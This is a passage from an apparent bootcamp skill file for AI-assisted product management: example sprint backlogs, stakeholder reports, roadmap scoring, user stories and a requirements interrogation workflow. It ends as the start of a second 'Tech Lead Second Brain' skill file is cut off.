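In practice each Then clause becomes one assertion, so the acceptance criteria double as the test plan.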
### 2. Sprint Backlog with Capacity Planning
```markdown
## Sprint 12 Backlog: Q2 Week 2-3
**Sprint Goal**: Launch customer meeting scheduling + payment integration
**Team Capacity**: 56 points (7 developers × 8 points/sprint)
**Forecast**: 38 points committed (68% utilization)
### High Priority Stories (15 points)
- [ ] PROJ-123: Schedule Demo Calendar Picker (8 pts) — Owner: Alice
- [ ] PROJ-124: Email Confirmation Emails (5 pts) — Owner: Bob
- [ ] PROJ-125: Calendar API Error Handling (2 pts) — Owner: Carol
**Dependencies**: None. Can start immediately.
### Medium Priority Stories (12 points)
- [ ] PROJ-126: Payment Gateway Integration (8 pts) — Owner: David
- [ ] PROJ-127: Invoice Generation (4 pts) — Owner: Eve
**Dependencies**: Blocked by PROJ-130 (3rd-party API credentials, expected EOD tomorrow)
### Nice-to-Have Stories (11 points)
- [ ] PROJ-128: Multi-timezone Support (5 pts) — Owner: Frank
- [ ] PROJ-129: Analytics Dashboard (6 pts) — Owner: Grace
**Dependencies**: None, can be deferred if other stories slip.
### Sprint Capacity Breakdown
| Developer | Committed | Max | Notes |
|-----------|-----------|-----|-------|
| Alice | 8 | 8 | Full capacity on calendar |
| Bob | 5 | 8 | Can take 3 more points |
| Carol | 2 | 8 | Light week, can help others |
| David | 8 | 8 | Full on payments |
| Eve | 4 | 8 | Can take 4 more points |
| Frank | 5 | 8 | Multi-timezone support |
| Grace | 6 | 8 | Analytics dashboard |
| **Total** | **38/56** | **56** | 18 point buffer |
### Risk Register
| Risk | Impact | Probability | Mitigation |
|------|--------|-------------|-----------|
| Calendar API rate limits | Medium | Medium | Add caching layer (Carol) |
| Payment vendor delays | High | Low | Have fallback processor (David) |
| Team unfamiliar with new auth system | Medium | Medium | Pair Frank with Alice |
### Burn-Down Projection
- **Day 1-3**: 38 → 20 points remaining (steep initial progress)
- **Day 4-5**: 20 → 8 points (testing phase)
- **Day 6-7**: 8 → 2 points (buffer)
- **Expected completion**: Day 8 of 10 (healthy buffer)
```
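The capacity check in the template above reduces to a few lines of code. This sketch uses the example's names and point values (illustrative only) and the stated 8-point per-developer cap:

```python
# Illustrative capacity check mirroring the sprint backlog template above.
PER_DEV_MAX = 8  # stated per-developer cap per sprint

committed = {
    "Alice": 8, "Bob": 5, "Carol": 2, "David": 8,
    "Eve": 4, "Frank": 5, "Grace": 6,
}

def capacity_flags(committed, cap=PER_DEV_MAX):
    """Return (total committed, team max, list of overcommitted devs)."""
    over = [dev for dev, pts in committed.items() if pts > cap]
    return sum(committed.values()), cap * len(committed), over

total, team_max, over = capacity_flags(committed)
print(f"{total}/{team_max} points committed; overcommitted: {over or 'nobody'}")
```

The same function flags individual overcommitment even when the team total looks healthy, which is the failure mode the capacity table is designed to catch.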
### 3. Stakeholder Report (Executive Summary)
```markdown
## Q2 Progress Report & Steering Committee Update
**Period**: Week 1-2 of Q2 2026
**Report Date**: March 15, 2026
**Audience**: Executive Leadership, Steering Committee
---
## Executive Summary
**Status**: 🟢 On Track
**Overall Progress**: 52% of Q2 roadmap complete (target: 50%)
**Key Milestone**: Customer onboarding portal launches March 25 (on schedule)
### The Ask
We need approval to add **1 designer and 1 QA engineer** to the team for Q3 to maintain velocity given increased feature requests. **Impact**: Prevents 2-week roadmap slip. **Cost**: $65K for 3 months.
---
## Progress Snapshot
### Completed (This Period)
✅ **User Authentication System** (PROJ-100-110)
- All acceptance criteria met
- 94% test coverage
- Zero critical bugs in QA
- Customer acceptance testing passed
✅ **Payment Integration** (PROJ-120-125)
- Stripe and PayPal connected
- End-to-end testing complete
- Ready for March 25 launch
### In Progress (Next 2 Weeks)
🔵 **Customer Onboarding Portal** (PROJ-200-210)
- 60% complete, on track for March 25
- Demo scheduled March 20 for executive feedback
- No blockers identified
🔵 **Analytics Dashboard** (PROJ-300-310)
- 35% complete, slight lag on data pipeline work
- Reassigned best engineer (Carol) to help; expect to catch up by March 22
### At Risk / Upcoming
🟡 **Mobile App Redesign** (PROJ-400-410)
- Starts April 1, depends on new design resource
- Current designer (Frank) overallocated at 120% capacity
- **Mitigation**: Hire contractor designer by March 25
---
## Metrics That Matter
| Metric | Target | Current | Status |
|--------|--------|---------|--------|
| Feature Delivery Rate | 12 features/quarter | 11 features (on pace) | 🟢 On track |
| Customer Adoption | 500 signups/month | 480 (March) | 🟡 Slightly below |
| Quality (P1 bugs) | <2 per sprint | 1 avg | 🟢 Healthy |
| Team Satisfaction | >8/10 | 7.8/10 | 🟡 Slight burnout signals |
| Time to Market | 2-week sprints | 2 weeks avg | 🟢 Consistent |
---
## Risk Register
| Risk | Impact | Status | Owner | Mitigation |
|------|--------|--------|-------|-----------|
| **Designer capacity (Frank at 120%)** | High | 🔴 Active | Sarah | Hire contractor, redistribute work |
| **Analytics data pipeline delay** | Medium | 🟡 Watching | Carol | Assigned best engineer, on track |
| **Customer adoption below forecast** | High | 🟡 Watching | Marketing | A/B test onboarding UX, gather feedback |
| **Mobile app timeline compression** | Medium | 🟢 Mitigated | Product | Hired contractor designer |
---
## What We Need From You
| Ask | Impact | Timeline |
|-----|--------|----------|
| **Approve 2 hires for Q3** | Prevents 2-week roadmap slip | Decision needed by March 31 |
| **Review design contractor proposal** | Keeps mobile app on schedule | Decision needed by March 25 |
| **Feedback on onboarding portal demo** | Ensures customer alignment | March 20 demo |
---
## Next Steps
1. **March 20**: Executive demo of customer onboarding portal
2. **March 25**: Launch customer onboarding portal to production
3. **March 31**: Staffing decision on Q3 hires (impacts roadmap)
4. **April 1**: Mobile app redesign begins with contractor designer
---
**Report prepared by**: [Your name]
**Questions?**: [Contact info]
```
### 4. Prioritized Roadmap with Rationale
```markdown
## Q2-Q3 Product Roadmap
**Planning Horizon**: 24 weeks
**Total Features Under Consideration**: 18
**Committed (Q2)**: 4 features (Tier 1)
**Planning (Q3)**: 4 features (Tier 2)
**Deferred (Q4+)**: 4 features (Tier 3)
---
## Prioritization Framework
Each feature is scored on **Value (1-5)**, **Revenue Impact (1-5)**, **Effort (1-5)**, and **Risk (1-5)**, producing a priority rank:
```
Priority Score = (Value × 3 + Revenue Impact) - (Effort × 2 + Risk × 1.5)
Rank 1-5 = Highest priority (launch first)
Rank 6-10 = Medium priority (launch if capacity)
Rank 11+ = Future or defer
```
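The scoring formula drops straight into code. A minimal sketch using the formula above; the feature names and Revenue Impact values are illustrative assumptions, not scores from the roadmap tables:

```python
def priority_score(value, revenue_impact, effort, risk):
    """Priority Score = (Value × 3 + Revenue Impact) − (Effort × 2 + Risk × 1.5)."""
    return (value * 3 + revenue_impact) - (effort * 2 + risk * 1.5)

# (value, revenue_impact, effort, risk) — all on a 1-5 scale
features = {
    "Payment Integration": (5, 5, 4, 2),
    "Customer Onboarding Portal": (5, 4, 3, 1),
    "Bulk CSV Import": (2, 1, 4, 2),
}

ranked = sorted(features.items(), key=lambda kv: priority_score(*kv[1]), reverse=True)
for rank, (name, scores) in enumerate(ranked, 1):
    print(f"{rank}. {name}: {priority_score(*scores):.1f}")
```

With these inputs the onboarding portal outranks payments (11.5 vs. 9.0) and bulk import goes negative, matching the deferral logic in Tier 3.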
---
## Ranked Roadmap: Q2-Q3
### Tier 1: Launch Now (Q2, Weeks 1-6)
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 1 | **Payment Integration** | 5 | 4 | 2 | Revenue generation | David | 90% done |
| 2 | **Customer Onboarding Portal** | 5 | 3 | 1 | Reduces support burden 40% | Alice | 60% done |
| 3 | **Email Notifications** | 4 | 2 | 1 | Critical for adoption | Bob | Backlog |
| 4 | **User Authentication Upgrade** | 4 | 3 | 3 | Security compliance | Carol | 80% done |
**Rationale**: All four features unlock revenue, reduce support load, and have clear success metrics. Payment and onboarding are customer-facing and high-impact. Should complete by March 31.
**Resource Allocation**: Alice (onboarding), David (payments), Carol (auth), Bob (notifications) — total 30 points.
---
### Tier 2: Plan for Q3 (Weeks 7-12)
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 5 | **Analytics Dashboard** | 5 | 4 | 2 | Reveals user patterns | Frank | Backlog |
| 6 | **Mobile App Redesign** | 4 | 5 | 3 | Improves engagement | Grace | Blocked: contractor |
| 7 | **API Rate Limiting** | 3 | 2 | 1 | Prevents abuse | Carol | Backlog |
| 8 | **Advanced Search** | 3 | 3 | 2 | Nice-to-have UX | Henry | Backlog |
**Rationale**: Analytics reveals what users care about (informs future prioritization). Mobile redesign is high-effort but high-value. API work is technical debt but necessary for scale.
**Dependencies**: Mobile redesign blocked by contractor hiring (expected March 31). Analytics depends on payment data (will be available from Q2 launch).
---
### Tier 3: Defer to Q4+ (If Capacity)
| Rank | Feature | Value | Effort | Risk | Reason for Defer |
|------|---------|-------|--------|------|-----------------|
| 9 | **Bulk CSV Import** | 2 | 4 | 2 | Low customer demand |
| 10 | **Custom Workflows** | 2 | 5 | 3 | Complex, low ROI |
| 11 | **Advanced Permissions** | 3 | 3 | 1 | Can be addressed in Q4 |
| 12+ | **Mobile Offline Mode** | 1 | 4 | 4 | Rare use case, high risk |
**Rationale**: These features are either low-impact (bulk import), high-complexity with low ROI (custom workflows), or not yet critical (offline). Revisit in Q4.
---
## Timeline & Capacity Projection
```
Q2 (Weeks 1-6): Tier 1 Features
├─ Week 1-3: Finish Payment + Onboarding (15 points)
├─ Week 3-5: Email notifications (8 points)
├─ Week 5-6: Auth upgrade buffer (7 points)
└─ Week 6: Customer demo + launch to production
Q3 (Weeks 7-12): Tier 2 Features
├─ Week 7-9: Analytics dashboard (12 points, requires new designer + mobile contractor)
├─ Week 9-11: Mobile redesign (15 points, with contractor)
├─ Week 11-12: API work + polish (5 points)
└─ Week 12: Stability & buffer
Q4+: Tier 3 + Customer-Driven Features
```
---
## Risk Adjustments
**Team capacity**: Current team at 90% capacity. Tier 2 assumes **1 designer + 1 contractor** hired by March 31.
**Timeline risk**: If contractor hire slips, Mobile redesign (Rank 6) moves to Q4.
**Market risk**: Mobile app redesign could be reprioritized if competitor launches; have contingency.
---
## Success Metrics (How We'll Know This Worked)
By end of Q3:
- ✅ Payment integration processing >$100K/month
- ✅ Onboarding portal adopted by >70% of new customers
- ✅ Analytics dashboard reveals >3 actionable customer insights
- ✅ Mobile app engagement increases 25% post-redesign
- ✅ Team satisfaction improves to >8.5/10
---
**Roadmap Last Updated**: March 15, 2026
**Next Review**: April 1, 2026
**Stakeholders**: Product, Engineering, Design, Executive
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"I need to capture requirements from our stakeholder interviews"
→ Scenario A (Requirements Capture)
"Help me plan the next 2-week sprint from our backlog"
→ Scenario B (Sprint Planning)
"I need to brief executives on Q2 progress and risks"
→ Scenario C (Stakeholder Communication)
"I have 20 features to prioritize for the next 2 quarters"
→ Scenario D (Roadmap Planning)
```
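The scenario mapping above can be sketched as a simple keyword router; the keyword lists are illustrative, not the skill's actual matching logic:

```python
# Toy scenario router matching the examples above.
SCENARIOS = {
    "A (Requirements Capture)": ["requirements", "user stories", "stakeholder interviews"],
    "B (Sprint Planning)": ["sprint", "backlog", "estimate"],
    "C (Stakeholder Communication)": ["status report", "executives", "steering"],
    "D (Roadmap Planning)": ["prioritize", "roadmap", "quarter"],
}

def route(request):
    """Return the first scenario whose keywords appear in the request."""
    text = request.lower()
    for scenario, keywords in SCENARIOS.items():
        if any(keyword in text for keyword in keywords):
            return scenario
    return "Ask a clarifying question"

print(route("Help me plan the next 2-week sprint from our backlog"))
# → B (Sprint Planning)
```

A real skill disambiguates with a follow-up question rather than keyword matching, but the routing shape is the same.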
### Step 2: Let the Skill Interrogate
The skill will ask 20-25 questions. **Answer fully and honestly** — this is where context richness happens.
Example interrogation flow:
```
Q1: What are we building?
A: A customer onboarding portal for our SaaS product
Q2: What's the business goal?
A: Reduce customer implementation time from 4 weeks to 2 weeks, improve retention
Q3: Who are the key stakeholders?
A: CEO, VP of Customer Success, sales team, 3-4 pilot customers
Q4: What's your timeline?
A: Must launch March 25 for Q2 goals, before sales kickoff
Q5: How many developers?
A: Team of 5, mixed seniority. This is new domain for most of them.
[... continues through all 23 questions ...]
```
### Step 3: Review Generated Artifacts
The skill will output:
- ✅ User stories with acceptance criteria (Given/When/Then format)
- ✅ Sprint backlog with capacity planning and burn-down projections
- ✅ Stakeholder report with executive summary and asks
- ✅ Prioritized roadmap with value/effort/risk scoring
### Step 4: Align & Execute
Take generated artifacts to team:
- Share user stories in backlog tool (Jira, Linear, Asana)
- Review sprint backlog with team in planning meeting
- Present stakeholder report to exec sponsors
- Walk through roadmap with engineering leads to refine estimates
---
## Design Principles
### Principle 1: Context Over Guessing
**Never generate requirements without understanding:**
- What problem does this solve for customers?
- What constraints exist (timeline, budget, team)?
- What does success look like (metrics, not just features)?
- What could go wrong (risks, dependencies)?
The interrogation phase ensures rich context before any artifacts.
### Principle 2: Structure Over Narrative
**Always output:**
- Structured user stories (not rambling requirements docs)
- Ranked backlogs (not brain dumps)
- Executive summaries (not long narratives)
- Prioritized roadmaps (not wishlists)
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Spec-Kit Methodology
**Always follow knowledge → specification → plan → execution:**
- **Knowledge**: What did we learn in interrogation?
- **Specification**: What are we building? (User stories)
- **Plan**: How will we build it? (Sprint backlog, timeline)
- **Execution**: Who does what? (Task ownership, dependencies)
This ensures nothing is missed.
### Principle 4: Acceptance Criteria Over Vagueness
**Every story includes:**
- Given/When/Then format (testable conditions)
- Edge cases identified
- Definition of Done criteria
- Explicit success metrics
This prevents the "I thought it meant..." conversations.
---
## Example: Complete Workflow
### Scenario: Requirements Capture for Customer Onboarding Portal
**You say:**
```
We need to build a customer onboarding portal.
It should help new customers get set up quickly without talking to our support team.
We have 5 developers, need to launch in 6 weeks, and we have 3 pilot customers willing to test.
```
**Skill interrogates (Phase 1: Business Context):**
```
Q1: What's the north star metric?
→ "Reduce implementation time from 4 weeks to 2 weeks"
Q2: Current state?
→ "Support team manually walks each customer through setup via Zoom calls"
Q3: Success definition?
→ "70% of new customers complete onboarding without support intervention"
Q4: Key stakeholders?
→ "VP of Customer Success (sponsor), 3 pilot customers, support team, sales"
Q5: Timeline?
→ "Hard deadline March 25 for Q2 goals"
```
**Skill interrogates (Phase 2: Scope & Requirements):**
```
Q6: Primary user?
→ "New customers (SMB to mid-market companies)"
Q7: Key workflows?
→ "1) Create account & login, 2) Configure settings, 3) Upload data, 4) Run first report, 5) Invite team members"
Q8: Constraints?
→ "Must work with existing auth system, no new infrastructure, budget $50K for contractor design help"
Q9: Known risks?
→ "Customers may have complex legacy data formats; support team will need training"
```
**Skill interrogates (Phase 3: Team & Capacity):**
```
Q10: Team composition?
→ "3 backend engineers, 1 frontend engineer, 1 QA, design contractor (4 weeks), I'm the PM"
Q11: Team experience?
→ "Backend experienced with Python/FastAPI; frontend new to React; no one knows our data formats"
Q12: Velocity?
→ "Typically 20 points per 2-week sprint"
```
**Skill interrogates (Phase 4: Acceptance & Validation):**
```
Q13: Acceptance criteria style?
→ "Given/When/Then format, we track with Jira"
Q14: Definition of Done?
→ "Code review approved, >80% test coverage, deployed to staging, pilot customer tested"
Q15: Validation?
→ "Pilot customers demo with VP of Customer Success; if 2/3 say 'ready', we ship"
```
---
### Skill Generates: User Stories
```markdown
## User Story: Create Account & Login
**Story ID**: ONBOARD-101
**Sprint**: Q2 Sprint 2-3
**Priority**: Critical (blocks all other workflows)
**Estimate**: 5 points
**Owner**: Frontend engineer
### Description
As a **new customer**, I want to **create an account and log in**, so that **I can start configuring my settings**.
### Acceptance Criteria
Given I'm on the landing page
When I click "Get Started"
Then I see a sign-up form asking for company name, email, and password
Given I fill in valid information
When I click "Create Account"
Then my account is created and I'm logged in
And I see the onboarding dashboard (next workflow)
Given I already have an account
When I click "Log In"
Then I see a login form
And after entering credentials, I'm logged in to the dashboard
Given I try to log in with invalid credentials
When I click "Log In"
Then I see an error message "Invalid email or password"
And my account is NOT locked (retry allowed)
Given I forget my password
When I click "Forgot Password"
Then I receive a password reset email within 1 minute
And I can set a new password via the email link
### Edge Cases
- What if customer enters email already used? (Show error, suggest login)
- What if password is too weak? (Show strength meter, enforce minimum complexity)
- What if customer closes browser before email confirmation? (Session expires after 24 hours, can resend)
### Dependencies
- ONBOARD-100: Design the login/signup UI (frontend)
- Uses existing OAuth provider (auth system)
- No new backend work needed
### Acceptance Checklist
- [ ] Frontend: Sign-up form renders correctly
- [ ] Backend: Account created in database with hashed password
- [ ] Email: Welcome email sent within 1 minute
- [ ] Security: No SQL injection, password validation works
- [ ] Test coverage: >80% of login paths tested
- [ ] Pilot test: 2/3 pilot customers successfully sign up
```
```markdown
## User Story: Configure Settings
**Story ID**: ONBOARD-102
**Sprint**: Q2 Sprint 3
**Priority**: High
**Estimate**: 8 points
**Owner**: Backend engineer
### Description
As a **new customer**, I want to **configure my basic settings** (company name, timezone, data retention policy), so that **the system knows how to handle my data**.
### Acceptance Criteria
Given I just logged in
When I navigate to Settings
Then I see a form with fields: Company Name, Timezone, Data Retention (30/90/365 days), Industry
Given I fill in settings and click "Save"
Then my settings are saved to the database
And I see a confirmation message "Settings saved successfully"
And the settings are immediately applied to my dashboard
Given I change my timezone from UTC to EST
When I save
Then all timestamps displayed on my dashboard now show EST
And the change takes effect immediately
Given a field is required (e.g., Company Name)
When I try to save without filling it
Then I see an inline error message "Company name is required"
And the form is not submitted
Given I accidentally navigate away
When I come back
Then my unsaved changes are NOT lost (browser stores locally)
And I can either save or discard
### Edge Cases
- What if customer selects a timezone not in our supported list? (Use closest match, show note)
- What if customer changes retention policy? (Data older than new policy is NOT deleted retroactively, only new data follows new policy)
- What if customer's industry isn't in our list? (Allow free-text entry)
### Dependencies
- ONBOARD-101: Customer must be logged in first
- Uses existing database table (no migration needed)
### Acceptance Checklist
- [ ] Frontend: Settings form renders and saves
- [ ] Backend: Settings persisted to database
- [ ] Timezone: All timestamps converted correctly
- [ ] Data retention: Policy logic documented for future data handling
- [ ] Test coverage: >80% of settings paths tested
- [ ] Pilot test: 2/3 customers confirm settings work as expected
```
---
### Skill Generates: Sprint Backlog
```markdown
## Sprint 2-3 Backlog: Onboarding Portal MVP
**Sprint Goal**: Launch customer onboarding portal MVP with account creation, settings, and data upload.
**Team Capacity**: 40 points (two sprints × 20-point team velocity)
**Forecast**: 38 points committed
### Stories (In Priority Order)
#### Critical Path (Must Have)
- [x] ONBOARD-101: Create Account & Login (5 pts) — Frontend engineer — **DONE**
- [x] ONBOARD-102: Configure Settings (8 pts) — Backend engineer — **IN PROGRESS**
- [ ] ONBOARD-103: Upload Data (13 pts) — Backend + Frontend — **BACKLOG**
- [ ] ONBOARD-104: Run First Report (8 pts) — Backend + Frontend — **BACKLOG**
- [ ] ONBOARD-105: Invite Team Members (4 pts) — Backend — **BACKLOG**
**Subtotal**: 38 points
#### Nice-to-Have (If Time)
- [ ] ONBOARD-106: Dark Mode (3 pts) — DEFER
- [ ] ONBOARD-107: Mobile-Responsive Design (5 pts) — DEFER
---
### Capacity Breakdown
| Person | Role | Committed (pts) | Capacity (pts) | Buffer |
|--------|------|-----------------|-----------------|--------|
| Alice | Frontend | 11 (login + upload UI) | 8 | -3 ⚠️ |
| Bob | Backend | 11 (settings + upload API) | 8 | -3 ⚠️ |
| Carol | Backend | 8 (reports) | 8 | 0 |
| David | Backend | 4 (invite team) | 8 | +4 |
| Eve | QA | 4 (upload test automation) | 8 | +4 |
| **Total** | | **38 points** | **40** | **Alice and Bob over ⚠️** |
**⚠️ PROBLEM**: The team total fits (38/40), but Alice and Bob are each overcommitted by 3 points while David and Eve have slack. Either rebalance or reduce scope.
**RECOMMENDATION**:
- Defer ONBOARD-105 (Invite Team Members, 4 pts) to Sprint 4 and move David onto upload work
- This brings us to 34 committed points, a 6 point buffer
- Shifting 3 points of ONBOARD-103 from each of Alice and Bob to David drops everyone to 8 points or fewer
---
### Dependency Graph
```
ONBOARD-101 (Login)
↓ (required by)
ONBOARD-102 (Settings)
↓ (required by)
ONBOARD-103 (Upload Data)
↓ (required by)
ONBOARD-104 (First Report)
Parallel: ONBOARD-105 (Invite Team) can start once ONBOARD-101 done
Blockers:
- ONBOARD-103 blocked by: Contract with data provider (expected March 18)
- ONBOARD-104 blocked by: Report templates from Product (expected March 15)
```
---
### Risk & Mitigation
| Risk | Impact | Probability | Mitigation |
|------|--------|-------------|-----------|
| Data upload parsing fails | High | Medium | Carol pair-programs with David, use CSV validation library |
| Over-committed team | High | High | **ACTION**: Defer ONBOARD-105 to next sprint |
| Report templates delayed | Medium | Medium | Have placeholder reports ready; update design once templates arrive |
| Pilot customer unavailable | Medium | Low | We have 3 pilots; need 2/3 for sign-off |
---
### Burn-Down Projection
```
Sprint Day 1-3: 34 → 20 points (steep initial progress)
Sprint Day 4-5: 20 → 8 points (testing phase)
Sprint Day 6-7: 8 → 2 points (final polish)
Sprint Day 8-10: 2 → 0 points (buffer)
Expected: Complete 34 committed points by Day 7, 6 point buffer for overflow
```
---
### Pre-Sprint Review Checklist
- [ ] All stories estimated by full team
- [ ] Dependencies identified and documented
- [ ] Risk register reviewed
- [ ] Pilot customer availability confirmed (schedule demo for Day 8)
- [ ] Contract with data provider expected (March 18)
- [ ] Report templates ready from Product (March 15)
```
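The dependency graph above is a textbook topological-sort problem. A minimal sketch using the standard library's `graphlib` (the story IDs mirror the example; real backlogs live in Jira or Linear):

```python
from graphlib import TopologicalSorter

# story -> set of prerequisite stories, from the dependency graph above
deps = {
    "ONBOARD-102": {"ONBOARD-101"},
    "ONBOARD-103": {"ONBOARD-102"},
    "ONBOARD-104": {"ONBOARD-103"},
    "ONBOARD-105": {"ONBOARD-101"},  # parallel: only needs login done
}

# static_order() yields a valid build/start order for the stories
order = list(TopologicalSorter(deps).static_order())
print(order)
```

`ONBOARD-101` always comes first, and `ONBOARD-105` becomes startable immediately after it, which is exactly the parallelism the graph calls out.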
---
### Skill Generates: Stakeholder Report
```markdown
## Onboarding Portal Status: Steering Committee Update
**Date**: March 15, 2026
**Project**: Customer Onboarding Portal MVP
**Sponsor**: VP of Customer Success
**Status**: 🟢 On Track
---
## Executive Summary
**What We're Doing**: Building a portal to let customers self-onboard (reduce support workload by 60%).
**Status**: Account creation ✅ done, settings in progress, data upload next week.
**Timeline**: Launching March 25 (on schedule) with 3 pilot customers.
**The Ask**: Keep current team allocation through Q2. No budget or headcount changes needed.
---
## Progress This Week
### Completed
✅ **Account Creation & Login** (ONBOARD-101)
- All acceptance criteria met
- Pilot customer tested, zero issues
- Ready to move to production
### In Progress
🔵 **Settings Configuration** (ONBOARD-102)
- 80% complete
- On track to complete March 18
- No blockers
### Upcoming
⏳ **Data Upload** (ONBOARD-103)
- Starts March 19
- Depends on data provider contract (expected March 18)
- Contingency: If contract delayed, we have placeholder workflow ready
---
## Key Metrics
| Metric | Target | Current | Status |
|--------|--------|---------|--------|
| Features complete | 80% by March 20 | 50% (2/4 features) | 🟡 Slightly behind |
| Pilot test sign-off | 2/3 customers | 2/3 piloting | 🟢 On track |
| Test coverage | >80% | 82% | 🟢 Healthy |
| Production readiness | Day 25 | On pace for Day 25 | 🟢 On track |
---
## Risks & Mitigations
| Risk | Status | Mitigation |
|------|--------|-----------|
| Data provider contract signed | 🟡 Watching | Contract lawyer expediting; fallback: placeholder API |
| Report templates delayed | 🟡 Watching | Have basic template ready; fine-tune after launch |
| Pilot customer feedback slow | 🟢 Mitigated | Scheduled weekly syncs; have 3 pilots so feedback redundancy |
---
## What We Need
**No asks at this time.** All required resources allocated. Keep current team through March 25 launch.
---
**Next Steering Update**: March 22
**Launch Date**: March 25
**Owner**: [PM name]
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Priority Builder Pattern
Map your product work to ABCD:
```
Action: Build customer onboarding portal
Behavior: Reduce implementation time 50%, ship with 70% adoption
Context: Self-serve lowers support burden, improves NPS
Delivered: Launch-ready, 3 pilot customers validated
```
### Using with ReAct Pattern
Systematically prioritize features:
```
THINK: What delivers value soonest? What's blocked?
ACT: Score features on value/effort/risk matrix
OBSERVE: Does ranked backlog align with business goals?
```
### Using with Tree of Thoughts
Complex roadmap decisions:
```
Generate: 3 prioritization approaches (customer-driven, revenue-driven, risk-driven)
Evaluate: Which aligns with company strategy?
Choose: Revenue-driven approach because it funds next headcount
```
---
## When to Use This Skill vs. Spreadsheet
| Task | Use Spreadsheet | Use Skill |
|------|-----------------|-----------|
| Quick vote on feature priority | ✅ Fast | ❌ Overkill |
| One-off status update | ✅ Simple | ❌ Overhead |
| Structured sprint planning | ❌ Too chaotic | ✅ **This skill** |
| **Requirements for complex feature** | ❌ Gets messy | ✅ **This skill** |
| **Roadmap for uncertain futures** | ❌ Too many assumptions | ✅ **This skill** |
| **Stakeholder alignment meeting** | ❌ Scattered | ✅ **This skill** |
| **Risk register with mitigations** | ❌ Spreadsheets don't capture logic | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 3: Applied Patterns** when discussing:
- Spec-kit methodology (knowledge → spec → plan → execution)
- Structured interrogation for context-gathering
- Alignment through structured artifacts
- Stakeholder communication patterns
### For Participants (Role-Fork Exercise)
**Use this skill when:**
- You're the "PO" or "PM" in a role-fork scenario
- You need to capture requirements from stakeholders
- You're planning a sprint or roadmap
- You need to communicate status to executives
- You're new to product management and need guidance
**Expected outcome:**
- Understand how interrogation surfaces hidden constraints
- See spec-kit methodology in action
- Generate executive-ready artifacts in minutes
- Build alignment through structured, repeatable formats
---
## FAQ
**Q: Will this skill tell me what features to build?**
A: No. It surfaces the context and structure to *help you decide*. You have the domain expertise and business intuition; this skill structures that thinking.
**Q: What if I don't know the answers to all 23 interrogation questions?**
A: That's expected! The skill will ask follow-ups to clarify. Unknown answers are insights — they reveal what you need to discover.
**Q: How is this different from just asking an LLM for a roadmap?**
A: The interrogation phase forces you to think through business context, team capacity, and risks *before* generating artifacts. Bad interrogation = bad roadmap. Rich interrogation = trusted roadmap.
**Q: Can I use this for agile projects with ongoing backlog refinement?**
A: Yes. Use it for sprint planning (refresh every 2 weeks) and quarterly roadmap reviews. The skill works iteratively.
**Q: What if my team has a different estimation system (T-shirt sizes, fibonacci)?**
A: Tell the skill during interrogation: "We estimate with T-shirt sizes (S/M/L/XL)." It will adjust the output format.
**Q: Can I use this for non-tech products?**
A: Absolutely. The framework works for any product/project with stakeholders, scope, and timeline. Interrogation questions adapt to your domain.
---
## References
- **Spec-Kit Methodology**: Joey's Prompt Engineering Bootcamp v2, Session 1
- **Given/When/Then Format**: Cucumber/BDD specification patterns (Wynne & Hellesøy, 2012)
- **Roadmap Prioritization**: RICE framework (Reach, Impact, Confidence, Effort)
- **Stakeholder Communication**: HBR "The Art of the Executive Summary" (2023)
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2
---
# skills-tl-second-brain.md
# https://jrlopez.dev/p/skills-tl-second-brain.md
---
name: tl-second-brain
description: Tech Lead second brain — interrogation-driven architecture decisions, metaprompting, and team technical standards using systematic patterns
version: 1.0
---
# Tech Lead Second Brain Skill
## Overview
The **Tech Lead Second Brain** is an expert advisor that guides tech leads through strategic technical decisions using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about system architecture, team capabilities, and constraints before proposing solutions
2. **Structure gets rewarded** — Uses structured output (ADRs, decision matrices, prompts) instead of loose advice
3. **You are the retrieval system** — Acts as an automated knowledge retrieval system for architectural patterns and team standards
This skill enables tech leads to tackle:
- ✅ Architecture Decision Records (ADRs) — systematic multi-option evaluation using Tree of Thoughts
- ✅ Metaprompting — creating prompts that generate role-specific prompts for the team
- ✅ Technical Spike Planning — scoping investigation work with clear decision criteria and time-boxes
- ✅ Team Technical Standards — building .cursorrules, .windsurfrules, and copilot instructions
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers comprehensive context before generating architecture decisions using a **"20 questions"-style interview** adapted for tech leadership:
- **System Architecture**: Current and target architecture patterns
- **Technical Stack**: Languages, frameworks, key dependencies, version constraints
- **Team Context**: Technical maturity levels, team size, key expertise gaps
- **Non-Functional Requirements**: Scale, latency, availability, throughput targets
- **Integration Points**: How this system touches others; dependency map
- **Operational Context**: Deployment pipeline, monitoring, observability, incident response
- **Constraints**: Budget, timeline, compliance, security requirements, technical debt inventory
### 2. Tree of Thoughts for Architecture Decisions
Generates decision options with **GENERATE → EVALUATE → DECIDE** pattern:
```
GENERATE: What are 3 fundamentally different approaches to this problem?
EVALUATE: What are the pros/cons/risks of each option?
DECIDE: Which option best balances constraints and team capabilities?
```
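As a sketch, the same loop can be mechanized against any text-in/text-out model. Everything below is illustrative — `ask_llm` stands in for whichever model client you use, and the prompts are placeholders, not the skill's actual wording:

```python
from typing import Callable

def tree_of_thoughts(problem: str, ask_llm: Callable[[str], str],
                     n_options: int = 3) -> str:
    """GENERATE -> EVALUATE -> DECIDE against any text-in/text-out model."""
    # GENERATE: force fundamentally different approaches, one call each
    options = [
        ask_llm(f"Propose approach #{i + 1} to: {problem}. "
                "It must differ fundamentally from the others.")
        for i in range(n_options)
    ]
    # EVALUATE: explicit pros/cons/risks per option
    evaluations = [
        ask_llm(f"List the pros, cons, and risks of:\n{opt}")
        for opt in options
    ]
    # DECIDE: choose with all evaluations in view, not from memory
    dossier = "\n---\n".join(
        f"Option {i + 1}:\n{opt}\nEvaluation:\n{ev}"
        for i, (opt, ev) in enumerate(zip(options, evaluations))
    )
    return ask_llm("Given these evaluated options:\n" + dossier +
                   "\nChoose one and justify it against the constraints.")
```

The point of the structure is that the DECIDE call sees every evaluation at once, which is what prevents premature convergence on the first familiar option.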
### 3. Metaprompting for Team Amplification
